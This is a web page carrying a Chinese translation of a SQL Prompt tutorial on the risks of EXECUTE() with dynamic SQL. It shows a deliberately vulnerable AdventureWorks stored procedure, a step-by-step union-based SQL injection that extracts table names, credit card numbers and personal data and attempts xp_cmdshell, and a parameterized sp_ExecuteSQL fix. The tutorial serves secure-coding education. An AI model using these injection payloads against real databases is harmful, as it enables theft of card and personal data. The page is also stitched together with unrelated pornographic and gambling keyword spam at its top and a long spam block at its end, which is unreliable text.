国产凹凸在线-国产拗女一区二区三区-国产白白视-国产白领-国产白拍-国产白丝jk被疯狂输-国产白丝喷-国产白丝在线

金喜正规买球

SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

翻譯|使用教程|編輯:莫成敏|2020-01-21 14:08:16.620|閱讀 314 次

概述:SQL Prompt的代碼分析規(guī)則BP013將提醒您使用Execute(string)來(lái)執(zhí)行字符串中的批處理,該字符串通常是根據(jù)用戶輸入動(dòng)態(tài)組裝的。這種技術(shù)很危險(xiǎn),因?yàn)閰?shù)值是在SQL Server解析該語(yǔ)句之前注入的,從而使攻擊者可以“標(biāo)記”額外的語(yǔ)句。請(qǐng)改用sp_ExecuteSql,并驗(yàn)證字符串輸入。

# 界面/圖表報(bào)表/文檔/IDE等千款熱門(mén)軟控件火熱銷(xiāo)售中 >>

相關(guān)鏈接:

SQL Prompt根據(jù)數(shù)據(jù)庫(kù)的對(duì)象名稱(chēng)、語(yǔ)法和代碼片段自動(dòng)進(jìn)行檢索,為用戶提供合適的代碼選擇。自動(dòng)腳本設(shè)置使代碼簡(jiǎn)單易讀--當(dāng)開(kāi)發(fā)者不大熟悉腳本時(shí)尤其有用。SQL Prompt安裝即可使用,能大幅提高編碼效率。此外,用戶還可根據(jù)需要進(jìn)行自定義,使之以預(yù)想的方式工作。

點(diǎn)擊下載SQL Prompt正式版


有時(shí)不可避免地使用動(dòng)態(tài)SQL,但是執(zhí)行直接從包含在執(zhí)行時(shí)更改的值的字符串直接創(chuàng)建的動(dòng)態(tài)SQL是魯莽的。它可以允許SQL注入并且效率也不高。

SQL Prompt的代碼分析規(guī)則,BP013將提醒您使用Execute(),以字符串形式執(zhí)行批處理,該批處理通常是根據(jù)用戶輸入動(dòng)態(tài)組裝的。使用此命令特別令人懷疑,因?yàn)樗辉试S您參數(shù)化值。

SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

即使您對(duì)可以提交的值有完全的控制和監(jiān)督,并確定它們永遠(yuǎn)不會(huì)來(lái)自最終用戶,還是最好使用sp_ExecuteSQL存儲(chǔ)過(guò)程對(duì)輸入進(jìn)行參數(shù)設(shè)置。這不僅更安全,而且還可以幫助查詢(xún)優(yōu)化器認(rèn)識(shí)到要執(zhí)行的SQL批處理已參數(shù)化,因此適合可重用的計(jì)劃。

無(wú)論是EXECUTE命令和sp_ExecuteSQL程序執(zhí)行批處理,而不僅僅是查詢(xún)。因此,即使您使用sp_ExecuteSQL,也很容易在存儲(chǔ)過(guò)程中引入SQL注入的漏洞。如果您錯(cuò)誤地將SQL與參數(shù)連接在一起,它將仍然允許惡意用戶引入向該批處理添加額外語(yǔ)句的輸入。

SQL注入漏洞

想象一下,AdventureWorks開(kāi)發(fā)人員看到此SQL并認(rèn)為“Aha”,我可以提供任何列表作為參數(shù)。

SELECT * FROM person.person WHERE lastname IN ( 'Goldberg', 'Erickson', 'Walters' );

很好,因此在存儲(chǔ)過(guò)程中,他可以動(dòng)態(tài)地匯編代碼

DECLARE @MyList NVARCHAR(50) = '''Goldberg'',''Erickson'',''Walters''';
  EXECUTE ('SELECT * from person.person where lastname in (' + @MyList + ')');

因此,現(xiàn)在他可以提供任何人的姓氏列表并得到結(jié)果。但是,當(dāng)代碼審查員指出可怕的可能性時(shí),現(xiàn)實(shí)很快就會(huì)出現(xiàn):

DECLARE @MyList NVARCHAR(50)='''factor'') Select * from sales.creditcard --'
   EXECUTE ('SELECT * from person.person where lastname in ('+@myList+')')

當(dāng)然,您可能會(huì)認(rèn)為這有點(diǎn)學(xué)術(shù)性,因?yàn)镾QL注入都是關(guān)于應(yīng)用程序中非參數(shù)化查詢(xún)的。好吧,不;引入漏洞的不僅僅是應(yīng)用程序。應(yīng)用程序可以正確地參數(shù)化對(duì)存儲(chǔ)過(guò)程的調(diào)用,如果存儲(chǔ)過(guò)程本身存在漏洞,則可以成功利用漏洞。通過(guò)演示更容易解釋。

入侵AdventureWorks

假設(shè)AdventureWorks創(chuàng)建了一個(gè)新網(wǎng)站,而開(kāi)發(fā)人員想要一個(gè)產(chǎn)品搜索屏幕,用戶在其中輸入搜索字詞,并且所有相關(guān)產(chǎn)品都顯示在列表中。是的,這似乎很合理。

向數(shù)據(jù)庫(kù)新手的開(kāi)發(fā)人員分配了任務(wù)。該網(wǎng)站以名為WebUser的用戶名建立了連接池。團(tuán)隊(duì)非常謹(jǐn)慎,并確保WebUser無(wú)法訪問(wèn)網(wǎng)站上的任何敏感信息。它只能訪問(wèn)網(wǎng)站上專(zhuān)門(mén)處理WebUser請(qǐng)求的存儲(chǔ)過(guò)程。這些存儲(chǔ)過(guò)程在模塊的當(dāng)前所有者的上下文中運(yùn)行,以訪問(wèn)少量基表中的數(shù)據(jù)的受限部分。這樣做是為了允許諸如WebUser訪問(wèn)必需的數(shù)據(jù)而不能直接訪問(wèn)任何表。這有效地防止了來(lái)自應(yīng)用程序的任何SQL注入訪問(wèn)接口中的過(guò)程或函數(shù)以外的任何東西。一些數(shù)據(jù)庫(kù)設(shè)計(jì)人員更喜歡使用沒(méi)有登錄的用戶來(lái)提供此服務(wù)。

到目前為止,一切都很好。

創(chuàng)建過(guò)程并要求數(shù)據(jù)庫(kù)開(kāi)發(fā)人員將其安裝到數(shù)據(jù)庫(kù)中之后,開(kāi)發(fā)人員然后在應(yīng)用程序中仔細(xì)地對(duì)存儲(chǔ)過(guò)程的調(diào)用進(jìn)行參數(shù)化,以確保應(yīng)用程序不會(huì)進(jìn)行任何SQL注入。

這是程序。當(dāng)然,這些評(píng)論是我的。我不想讓任何人認(rèn)為這是一個(gè)好習(xí)慣。通過(guò)使用EXECUTE(),將撤消上述所有明智的預(yù)防措施。

/* we will now create a procedure that not only uses EXECUTE but also
  fails to check the contents of the string parameter passed to it*/
  IF Object_Id('dbo.SelectProductModel') IS NOT NULL
      DROP procedure dbo.SelectProductModel;
  GO
  CREATE PROCEDURE dbo.SelectProductModel @queryString VARCHAR(255)
  WITH EXECUTE AS OWNER --to execute as the login who created this procedure
  AS--health warning!!! This is a demonstration of how not to do it
  EXECUTE (
  'SELECT name,summary,Wheel,Saddle,Pedal, RiderExperience 
    FROM Production.vProductModelCatalogDescription
      WHERE ( name+summary  LIKE ''%'+ @queryString+'%'' )')
  GO--health warning!!! This is a demonstration of how not to do it

使用動(dòng)態(tài)執(zhí)行的代碼有時(shí)有很好的理由,但是這些幾乎總是涉及參數(shù)。在這種情況下,開(kāi)發(fā)人員需要使用sp_ExecuteSql。最重要的是,應(yīng)使用正確的約定將所有參數(shù)傳遞給它。在此示例中,沒(méi)有必要使用動(dòng)態(tài)SQL,但如果已經(jīng)這樣做,則應(yīng)該這樣做。

IF Object_Id('dbo.SelectProductModel2') IS NOT NULL
      DROP procedure dbo.SelectProductModel2;
  GO
  CREATE PROCEDURE dbo.SelectProductModel2 @queryString VARCHAR(255)
  WITH EXECUTE AS owner
  AS
  EXECUTE sp_ExecuteSQL 
  N'SELECT name,summary,Wheel,Saddle,Pedal, RiderExperience 
    FROM Production.vProductModelCatalogDescription
     WHERE (name+summary  LIKE ''%''+@search+''%'')',N'@search Varchar(20)',@search=@QueryString
  GO

您可以在以下示例中嘗試此版本以證明它。我也會(huì)添加一些參數(shù)驗(yàn)證,因?yàn)槲蚁朐谕砩纤瘋€(gè)好覺(jué)。有一些客戶希望搜索有關(guān)自行車(chē)的短語(yǔ),但其中不包括“–”。

現(xiàn)在,為了說(shuō)明這一點(diǎn),我應(yīng)該讓您(讀者)建立一個(gè)帶有搜索表單和網(wǎng)格的網(wǎng)站,以顯示結(jié)果。相反,我們將在SSMS中對(duì)此進(jìn)行仿真,以便您可以嘗試并嘗試一下。

設(shè)置了惡意程序后,我們創(chuàng)建了無(wú)權(quán)執(zhí)行任何操作的網(wǎng)站用戶。然后,我們以該用戶身份執(zhí)行任務(wù),并查看通過(guò)顯著的數(shù)據(jù)泄露我們可以走多遠(yuǎn)。

IF EXISTS (SELECT * FROM sys.sysusers AS S2 WHERE S2.name LIKE 'WebUser')
       DROP USER Webuser;
    -- We need to execute some of the following code with the restricted access rights of a
    -- typical web user that has only access rights to the stored procedure that accesses
    -- the table We then run part of the script as that user.
    CREATE USER WebUser WITHOUT LOGIN;
  /* we now assign it permission to call the stored procedure. It has no choice because
  this is being done in middleware on the web server. Every attempt to break into the database has to be done merely by changing the search term for Adventureworks bicycles.
  */
   GRANT EXECUTE ON OBJECT::dbo.SelectProductModel
      TO WebUser;  
   GRANT EXECUTE ON OBJECT::dbo.SelectProductModel2
      TO WebUser; 
  execute as user = 'WebUser'
  /* now we are working as WebUser. */

您必須想象我是一個(gè)外部入侵者,是通過(guò)網(wǎng)站而不是SSMS執(zhí)行此操作的(如果我可以訪問(wèn)它,那么我已經(jīng)出門(mén)在外了。)我必須將搜索詞放入網(wǎng)絡(luò)表單中并研究結(jié)果。我對(duì)此數(shù)據(jù)庫(kù)一無(wú)所知。因?yàn)轱@示了錯(cuò)誤,我得到了幫助,并且可以在網(wǎng)站結(jié)果網(wǎng)格中看到結(jié)果。即使沒(méi)有錯(cuò)誤,我也會(huì)受到輕微的抑制,因?yàn)閺捻憫?yīng)時(shí)間可以判斷很多事情。

我的第一個(gè)目標(biāo)是找出表的名稱(chēng)及其模式。如果我不了解他們,那么會(huì)經(jīng)歷很多嘗試和錯(cuò)誤,這可能需要很長(zhǎng)時(shí)間和耐心。然后,我需要知道列和數(shù)據(jù)類(lèi)型。如果我能找到一種方法來(lái)做所有的事情,那我就可以回家了。

我們開(kāi)始吧。

Execute dbo.SelectProductModel 'light'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

這似乎行得通。讓我們通過(guò)添加表達(dá)式來(lái)檢查是否正確地將其參數(shù)化。我作為“WebUser”,想知道“始終正確”的技巧是否有效。我輸入搜索詞“輕”或1 = 1 –“

EXECUTE dbo.SelectProductModel 'light'' or 1=1 --'
    /* Msg 102, Level 15, State 1, Line 59 Incorrect syntax near '1'*/

服務(wù)器端錯(cuò)誤肯定表明該漏洞存在。我需要添加一個(gè)括號(hào)嗎?

EXECUTE dbo.SelectProductModel 'light'') or 1=1 --'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

這列出了所有產(chǎn)品型號(hào)。 如果您使用該過(guò)程的第二個(gè)版本SelectProductModel2,該查詢(xún)將不返回任何產(chǎn)品,因?yàn)樗鼘⑺阉髯址?light')或1 = 1-,這根本不存在。

  /* Can I do the union all trick? */
  --I don't know the names of any tables so I'll use functions
  EXECUTE dbo.SelectProductModel 'ffff'') union all
   SELECT db_name(), @@Servername,User_Name(), ORIGINAL_LOGIN( ) , session_user,''''
    --'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

 /* well that works and tells me that all columns are strings because I got no error 
   in the UNION. Within the stored procedure, I'm A DBO!!! */
  EXECUTE dbo.SelectProductModel 'ffff'') union all
   SELECT Object_schema_name(object_id), name, '''','''','''','''' from sys.tables
    --'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

/* some interesting tables. I like that CreditCard table. This saves me a lot of time 
  Where are the credit cards? */ 
  EXECUTE dbo.SelectProductModel 'ffff'') union all
  SELECT Object_schema_name(t.object_id),t.name,c.name,'''','''','''' FROM sys.columns c INNER JOIN sys.tables t ON c.object_id=t.object_id WHERE t.name=''creditcard''
   --'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

/* this is taking candy from a baby. We know the columns and table now!
  List out the credit cards on the website grid and over to the dark side */ 
  EXECUTE dbo.SelectProductModel 'ffff'') union all
  Select CreditCardID,CardType,CardNumber,ExpMonth,ExpYear,ModifiedDate from Sales.Creditcard
   --'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

/* Can I use xp_cmdshell? */
  EXECUTE dbo.SelectProductModel 'ffff'');
  Execute xp_cmdshell ''dir *.*''
   --' 
  /* No. maybe I can reconfigure  */
  EXECUTE dbo.SelectProductModel 'ffff'');
  execute sp_configure ''show advanced options'',1;reconfigure with override 
  --' 
  /*
  Msg 15247, Level 16, State 1, Procedure sp_configure, Line 105 [Batch Start Line 96]
  User does not have permission to perform this action.
  Msg 5812, Level 14, State 1, Line 100
  You do not have permission to run the RECONFIGURE statement*/
不要緊。我仍然可以通過(guò)網(wǎng)站獲取有效載荷。現(xiàn)在我有了信用卡,我去找那個(gè)person.person表。某件事告訴我那里有個(gè)人數(shù)據(jù)。讓我們研究一下該表中的內(nèi)容。

EXECUTE dbo.SelectProductModel 'ffff'') union all
  SELECT Object_schema_name(t.object_id),t.name,c.name,is_nullable,max_length,system_type_id FROM sys.columns c INNER JOIN sys.tables t ON c.object_id=t.object_id WHERE t.name=''person''
   --'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

我認(rèn)為,從這些數(shù)據(jù)來(lái)看,如果我將各列連接在一起,則可以一次性提取出來(lái)。

EXECUTE dbo.SelectProductModel 'ffff'') union all
  SELECT persontype,BusinessEntityID,Coalesce(Title+'' '','''')+FirstName+'' ''+Coalesce(MiddleName+'' '','''')+LastName+Coalesce('' ''+Suffix,''''),EmailPromotion,AdditionalContactInfo,Demographics FROM person.person
    --'
SQL語(yǔ)法提示工具SQL Prompt使用教程:使用EXECUTE(“SQL腳本”)的風(fēng)險(xiǎn)

簡(jiǎn)而言之,AdventureWorks的所有個(gè)人詳細(xì)信息和銷(xiāo)售現(xiàn)在都在走向黑暗網(wǎng)絡(luò)。當(dāng)然,這很費(fèi)力,因?yàn)槲乙ㄟ^(guò)網(wǎng)站上的POST獲取有效負(fù)載,并且可能不得不重新組裝來(lái)自位的數(shù)據(jù),但是即使是很小的破壞也會(huì)造成破壞!

最后整理一下

SELECT USER_NAME();
  REVERT;
  SELECT USER_NAME();
  IF EXISTS (SELECT * FROM sys.sysusers AS S2 WHERE S2.name LIKE 'WebUser')
      DROP USER WebUser;
  IF OBJECT_ID('dbo.SelectProductModel') IS NOT NULL
      DROP PROCEDURE dbo.SelectProductModel;

結(jié)論

將字符串作為SQL批處理執(zhí)行的技術(shù)本質(zhì)上沒(méi)有錯(cuò)。但是,這是編程的安全領(lǐng)域。如果不參數(shù)化該字符串中的值,則可能很危險(xiǎn)。有時(shí),由于SQL語(yǔ)法的多變,您無(wú)法做到,而且也沒(méi)有解決方法,在這種情況下,您需要采取所有必要的預(yù)防措施來(lái)驗(yàn)證輸入。出于這個(gè)原因,不鼓勵(lì)使用Execute(),因?yàn)樗鼪](méi)有參數(shù)化其輸入的方法,并且檢查sp_ExecuteSQL的使用,以確保已采取所有適當(dāng)?shù)念A(yù)防措施來(lái)防止SQL注入,所以是一個(gè)好主意。

本文內(nèi)容到這里就結(jié)束了,感興趣的朋友可以下載SQL Prompt免費(fèi)體驗(yàn)~也可以關(guān)注我們網(wǎng)站了解更多產(chǎn)品資訊~

相關(guān)內(nèi)容推薦:

SQL Prompt 使用教程>>>


想要購(gòu)買(mǎi)SQL Prompt正版授權(quán),或了解更多產(chǎn)品信息請(qǐng)點(diǎn)擊




標(biāo)簽:

本站文章除注明轉(zhuǎn)載外,均為本站原創(chuàng)或翻譯。歡迎任何形式的轉(zhuǎn)載,但請(qǐng)務(wù)必注明出處、不得修改原文相關(guān)鏈接,如果存在內(nèi)容上的異議請(qǐng)郵件反饋至chenjj@fc6vip.cn

文章轉(zhuǎn)載自:

為你推薦

掃碼咨詢(xún)


添加微信 立即咨詢(xún)

電話咨詢(xún)

客服熱線
023-68661681

TOP
国产欧美视频一区二区三区 | 国产精品任我爽爆在线播放 | 久热九九 | 美女露胸无遮 | 国产在线播放不卡免费 | 成年人影片免费看 | 乱子伦一区二区三区 | 国产在线精品一区二 | 亚洲成l人在线观看线路 | 噼里啪啦免 | 日本sm极度另类视频 | 99精品国产高清一区 | 精品日产卡一卡二卡三入口 | 99精品国产自在现线国产品在 | 九九视频免费精品视频免费 | 国产福利自产拍在线观看 | 老司机在线观看亚 | 安眠药扒 | 欧洲亚洲精品免费二区 | 激情婷婷 | 国产精品乱 | 新版资源天堂中文 | 热门电影电视剧短剧免费在线观看 | 国产一区国产二区在线精品 | 精品视频在线观看一区二区 | 国产办公室沙发系列 | 9re久精品视频 | a级国产乱理论片在线观看 国产乱肥老妇国产一区二 国产日韩欧美视频成人 | 中文在线日韩 | 国产午夜福利在线观看视频 | 国产91精品一区二区 | 欧洲亚洲综合在线播放 | 午夜福利在 | 高清一区二区三区 | 欧美人成在线播放网站色 | 亚洲欧美日韩ⅴ在线观看91 | 亚洲欧洲国产精品香蕉网 | 日韩有码中文字幕在线视频 | 国产精品三级三级 | 国产免费蜜桃视频网 | 日韩欧美亚洲三 | 国产剧情91露脸一区 | 日韩高清不卡免费一二三区视频 | 91高清免费国产自产 | 国产精品精品国产一区 | 337p欧美顶级日本大片 | 日韩女同在线二区三区 | 国产一区二区三区乱码在线观看 | 91香蕉 | 国产九九99视频在线播放 | 好吊色在线免费 | 92精品国产自产在线观看48 | 九九视频在线观看视频6 | 凹凸网址导航 | 福利成人春色在线观看免费网站 | 91高清完整版在线观看 | 国产一二三四区乱码免费 | 夜夜夜一区二 | 欧美综合婷婷欧美在线 | 成人国产精品免费视频不卡 | 欧美精品亚洲精品日韩专 | 中文字幕乱码免费专区 | 国内精品视频在 | 国产精品一级二级三级 | 91一区二区在线观看精品 | 成人免费大片黄在线播放 | 国产精品第一页 | 欧美精品高清在线观看 | 国产午夜福利精品一区二区三区 | 欧美日本免费一 | 午夜在线视频 | 日韩中文字幕网站 | 国产专区第一页 | 国产爽死你个荡货h粗暴视频 | 日韩国产欧美精品综合二区 | 久章草在线视频 | 最新电影 | 红杏免费视频网站入口导航 | 岛国大片在线一 | 亚洲国产欧美在线观看 | 欧美性受xxxx狂喷水 | 欧美性爱网站激情性爱视 | 成人午夜污污在线观看网站 | 国产国产成年年人免费 | 亚洲精品在线不卡 | 黑巨茎大战俄罗斯美 | 日韩女人**片在线播放 | 成人激情午夜福 | 午夜插插插| 欧美日韩a∨不卡视频在线 亚洲一码二码三码 | 亚洲欧美乱综合图片区小说区 | 欧美精品在线免费一区 | 欧美性猛交xxxxxxxx | 亚州精品一区中文字幕乱码 | 草草精品在线视频 | 91精品国产自产 | 露脸对白不带套在线播放 | 疯狂添女| 欧美人与动交zoz0 | 美女被男人桶到爽免费网站 | 99在线精品视频在线观看 | 欧美日韩精品一区二区三区 | 国产在线观看无 | 欧美日韩在线一区二区观看 | 日本成a人片在线观看网址 视频试看 | 国产极品高颜值美女在线 | 精品国产伦一区二区三区在线 | 欧美日韩精品一区在线播放 | 亚洲日本aⅴ精品一区二区在线 | 国产日韩欧美小视频 | 免费精品在线观看 | 精品国产自在精品国产精 | 国产超薄肉丝袜在线 | 老熟女hdxx中国老熟女 | 国产亚洲欧美另类第一页 | 手机免费在线追剧网站 | 亚洲欧美日韩不卡在线观看 | 亚洲欧洲国产码专区在线观看 | 91精品国产免费观看 | 区激情校园小说 | www免费视频在线观看播放 | 国产大片一区 | 欧美日韩一区二区三区中字幕 | 欧美人与动牲 | 日韩精品欧美激情亚洲综合 | 精品国产日韩专区欧美第一页 | 亚洲日韩国产综合区 | 欧美系列国产系列一 | 91影院| 小说区综合区 | 在线欧美日韩亚洲国产一区 | 国产一二三区在线播放 | 精品一线二线三线区别在哪欧美 | 欧美综合精品一区二区二 | 国产亚洲精品精品精品 | 国产精品亚洲玖玖玖在线靠爱 | 欧美一级欧美三级在线观看 | 精品一区二区三区三区 | 亚洲欧美另类天天更新影院 | 亚洲午夜国产精 | 自拍偷拍 | 国产精品自拍视频 | 日韩在线一区二区三区免费视 | 久热精品免费视 | 国产欧美日韩一区二区加勒比 | 欧美三级a做爰在线观看 | 在线观看福 | 国产精品偷窥熟女欧美激 | 日韩欧美国产一区二区三区 | 蜜桃网址 | 三级国产久 | 中美日韩亚洲中文专区小说 | 国产对白合 | 成人国产精品一区二区免费 | 中国xxx农村性视频 国产伦精品一区二区三区免.费 | 日本aⅴ精品一区二区三区 国产精品亚 | 日韩欧美不卡视频中文字幕 | 在线日韩日本国 | 国产亚洲精品不卡 | 91九色蝌蚪 | 91精品综合 | 国产精品美妞一区二区三区 | 91精品视频在线 | 日本高清视频一区二区三区 | 一本到国产在线精 | 欧美精品视频在线不卡 | 在线观看三缀片免费视频电 | 亚洲欧美日韩精品中文乱码 | 亚洲高清视频一区 | 精品丝袜国产自在线拍a∨婷婷 | 成人精品第一区国产 | 欧美嫩交一区二区三区 | 99视频经典在线观看的 | 亚洲天堂视频在线免费观看 | 亚洲欧美韩 | 国产精品视频在这里有精品 | 日本午夜福利精品视频 | gogogo免费高清在线 | 国产伦精品一区二区三区 | 国产原创精品在线 | 99精产国品一二三产区区别 | 韩国伦理中文字幕 | 天美麻花果冻苏蜜清歌 | 精品日本一区二区三区在线观 | 成人啪精品视 | 亚洲和欧洲一码二码区别在 | 国产自产一二三区 | 亚洲欧美在线综合一区 | 日本精品一区在线观看 | 国内一区二区三区在线观看 | 91午夜理伦私人影院 | 不一样的国产爽歪歪视频 | 欧美αv | 国产精品99精品一区二区浪潮 | 国产精品久 | 最近中文字幕免费完整视频1 | 韩国日本免费高清观看 | 日本三级强在线观看 | 日本国产在线精品专区 | 国产精品日本欧美一区二区 | 男女肉车| 欧美精品videosex性欧美 | 欧美交换 | 精品国产自在精品国产精 | 国产高清在线a视频大全 | 日韩亚洲人成网站在线播放 | 亚洲综合偷拍一区二区三 | 女同另类激情重口 | 国产免费不卡一区在线视频 | 国产精品自产拍在线观看55 | 综合在线观看视频国产 | 国产办公室三 | 韩日精品在线观看 | 18处破外女出血视频在线观看 | 成年奭片免费观看午夜 | 免费人成视频年轻人在线无毒不卡 | 色一情一伦一区二区三 | 精品入口菠萝 | 国产中文字幕第一页 | 最新好看的影视大全在线观看 | 国内自拍一二三四2025 | 91丨国产丨 | 9cao在线观看| 深夜激情网 | 日韩中文字幕精品一区 | 成人污污国产在线观看 | 国产天堂亚洲国产碰碰 | 欧美激情一区二区三区牲牛牛 | 婷庭九月天综合水蜜桃 | 在线观看日韩欧美 | 一区二区三区中文字幕 | 国产网红精品紫薇视频 | 免费久章草在线视频国产 | 337p日本大胆欧美人 | 99视频经典在线观看的 | 国产午夜专区在线观看 | 精品国产午夜理论片不卡 | 免费观看一级特黄欧 | 精品国产香蕉伊思人在线 | 91福利在线视 | 日本健身教练 | 成人性欧美 | 中文字幕亚洲 | 亚洲国产在人线播放 | 欧美777| 日本va午 | 91青青草原| a级精品九九九大片免费看 国产在线观看第二十三页 亚洲午夜成人精品电影在线观看 | 国产在线日韩一区精品 | 国产视频91完整版播放 | 三区精品在线观看 | 国产在线午夜卡精品影院 | 91啪在线视频 | 国产精品亚洲产品一区二区三区 | 国产老妇伦国产熟女中文视频 | 国产成年码 | 免费aⅴ在线视频 | 免费国产自在线拍 | 国产又黄又爽在线观看 | 午夜a级理论片在线播放可米 | 亚洲一区二区三区高清 | 国产一区二区免费 | 精品国产综合色在线 | 99国产综合亚洲精品 | 欧洲精品视频一二三区视频 | 国产普通话对白 | 国产乱肥老妇精品视频 | 成人精品免费在 | 日本中文字幕一區二區三區不卡 | 国产伦久视频免费观看视频 | 久jiu久影视 | 国产日韩精品视频 | 国产九一精品动漫在线观看 | 99精品国产丝袜在线 | 精品国产乱子伦一区 | 欧美激情在线免费观看 | 成人精品国产 | 欧美日产国产韩国 | 精品视频偷拍 | 日本在线免费观看aⅴ | 为您呈现最新最热的电影力作 | 一区二区视频在线观看入口 | 成人影院yy111111在线 | 在线日本看片免费人成视久网 | 国产精品日韩中文字幕 | 韩国伦理电影在线观免费观看 | 99精品视频在线 | 777米奇| 中文字幕国产专区99 | 天堂中文在线资源 | 欧美成妇人吹潮在线播放 | 国产精品自在线午夜福利高 | 高分经典热播电视剧排行榜 | 免费高清电影大全 | 精品国产午夜在线 | 国产一区二区三区小说激情 | 国产老女露脸二区 | 国产精品一区二区三区在线观看 | 免费无人区一码二码乱码区别在哪 | 国产一区二区在线播 | 国产精品亚洲欧美动漫卡通 | 日韩欧美一及在线播放 | 老熟女hdxx中国老熟女 | 性生交生活影碟 | 亚洲精品中文字幕视频网站 | 亚洲国产中文日韩欧美在线 | 99这里有精品视频 | 青青国产精 | 日韩新片网在线精品 | 欧美日韩精品一 | 欧美xx| 亚洲综合欧美在线 | 日本一道一区二区免费看 | 欧美一级在线观 | 最新免费电影 | 很黄很色的免费视频在线观看 | 免费国产老师高 | 精品成人大胸美女视频在线播放 | 免费人成在线观看视频品爱网 | 青青草无 | 欧美激情综合三区 | 国产精品自在在线香蕉 | 一区二区三区四区视频 | 真实国产乱子伦 | 国产伊人 | 三级理论电影三级午夜电影院 | 99日韩福利电影手机版 | 国精产品一品二品国 | 国产精品五月天 | 国产玉足脚交极品在线视频 | 成aⅴ人免费观 | 国产欧美日韩一区二区综合 | 第一页浮力影院草草 | 国产亚洲精品在线视频就在线 | 欧美日韩欧美 | 羞羞网站在线观看 | 在线成人亚洲一区电影 | 亚洲一区二区三区下卡精品 | 99热这里只有精品动漫国产 | 日韩中文字幕在线不卡视频 | 精品在线观看三级国产 | 爱在线精品视频网站 | 福利电影大全 | 国产乱理伦片在线观看 | 中日欧洲精品视频在线 | 成人免费网站污污在线观看 | 亚洲一区二区在线欧洲 | 91短视频app免费 | 国产精品敌一区二区三区 | 五月激情丁香婷婷综合第九 | 国产精品有码在线观看播放 | 国产一级婬片a免费 | 国产对白精品刺激一区二区 | 欧美一性一乱 | 国产在线精品拍揄自揄免费 | 国产一级a毛一级a看免费视频 | 国产亚洲人在线观看不卡 | 免费人成视网站在线不卡 | 乱码女一区二区三区 | 成人精品国产区在线观看 | 欧美影视三级亚洲 | 69精产国品 | 日韩乱码人| 日本最新免费二区 | 欧美精品一区二区男同专区 | 不卡一区二区三区在线视频 | 中文综合第二页 | 日本成片免费观看视频在线 | 日韩精品欧美精品国产精品 | 无人区大片中文字幕在线 | 国产日韩欧美视频成人 | 精品午夜在 | 日韩免费一区二区三区高清 | 最好看中文字幕国语电影 | 日本精品一区二区在线播放 | 欧美激情性猛交 | 白虎视频污 | 国产亚洲女人 | 国语精品91自产拍在 | 日本中文字幕乱码 | 国产精品视频一区二区 | 日产亚洲一 | 日本特黄特色免费亚洲日本 | 精品国产污网站在线观看15 | 国产干b| 亚洲日本一区二区三区在线 | 精品国产一区二区三区a | 国产又大又硬 | 精品国产乱子伦一区二区三区 | 国产在线拍偷 | 欧美日韩在线看 | 欧美日韩一本无线码专区 | 国产精品大全国产精品 | 欧美日韩国产v另类 | 欧美一性一乱 | 国产jk制服丝袜午夜视频 | 国产资源一区 | 日韩亚洲产在线观看 | 日韩欧美亚洲国产 | 欧美三级在线播放 | 日本在线xxxx | 在线视频播放 | 欧美?日韩? | 欧美一级α片在线 | 成人精品视频99在线观看免费 | 一级特黄aaa大片在线观看视频 | 欧美肥胖老妇与子乱欲视频 | 久99视频精品免费观看福利 | 日本www视频在线观看 | 国产亚洲一区激情小说 | 国产又爽又色又刺激视频含羞草 | 国产精品高清视亚洲中文 | 黄页网站视频 | 福利片免费 | 欧美特级特黄aa | 国产一区二区三区精美视频 | 亚洲高清heyzo | 欧美午夜成午夜成年片在线观看 | 妺妺窝人体色www聚色窝仙踪 | 欧美成在线播放 | 羞羞视频免费在线观看 | 在线观看国产视频黄 | 日韩丝袜亚洲国产欧美一区 | 东方aⅴ免费观看 | 蜜桃传媒在 | 欧美阿v高清资源不卡在线播放 | 国产在线精品一区二区不卡 | 中文天堂资源在线www | 国产在线拍揄自揄免费一区 | 日本中文有 | 国产日韩一区二区三免费高清 | 欧产日产国产水蜜桃 | 国产极品视觉盛宴 | 日韩卡1卡2卡三卡免费网站 | 91国语福利影院 | 最近更新中文字幕在线 | 国产在线观看激情 | 欧美肥胖老妇与子乱欲视频 | 国产午夜三级一区二区三 | 欧亚一级毛 | 国产对白普通话视 | 精品亚洲欧美中文字幕在线看 | 国产隔着超薄丝袜进入 | 亚洲欧美一区二区三区在线 | 国产精品欧美一区 | 日本www视频在线观看 | 欧美日韩国产在线观看网站 | 午夜福利理论片高清在线观看 | 国产日韩一区二区三区在线观看 | 色橹橹欧美在线观看视频高 | 国产乱子伦沙发睡午觉 | 国产精品区二区三区日本 | 国产精品国产自线拍免费 | 日本三区不卡高清更新二区 | 欧美日韩精品一区 | 国产极品视频一区二区三区 | 日本亚洲欧美在线视 | 亚洲国产日韩一级二级三 | 国自产视频在线观看 | 园内精品自拍视频在线播放 | 亚洲中文字幕30页 | 水蜜桃成视频人在线看 | 成人午夜视频网站 | 欧美人体视频一区二 | 精品精品国产高清 | 日韩欧美国 | 亚洲欧美v视色一区二区 | 精品一区二区三区的国产在线观 | 女儿国3在线观看免费版高清 | 亚洲v日韩v欧美在线 | 日韩欧美国产免费看 | 成人精品视频一区二区三区尤物 | 中日欧洲精品视频在线 | 成年人网址在线观看 | 国产香蕉尹人视频在 | 国产一区成人 | 国泰饭店 | 90dvd国产高清视频 | 国产三区四区五 | 国产欧美日韩精品在线观看 | 国产老熟女精品视频大全 | 在线一区二区美欧视频 | 亚洲一区二区福利在线观看 | 日a本亚洲中文在线观看 | 国产高清在线精品一区二区三区 | 污污网站免费 | 西西人体ww| 国产在线欧美日韩精品一区 | 在线免费看影视网站 | 88国产精品欧美 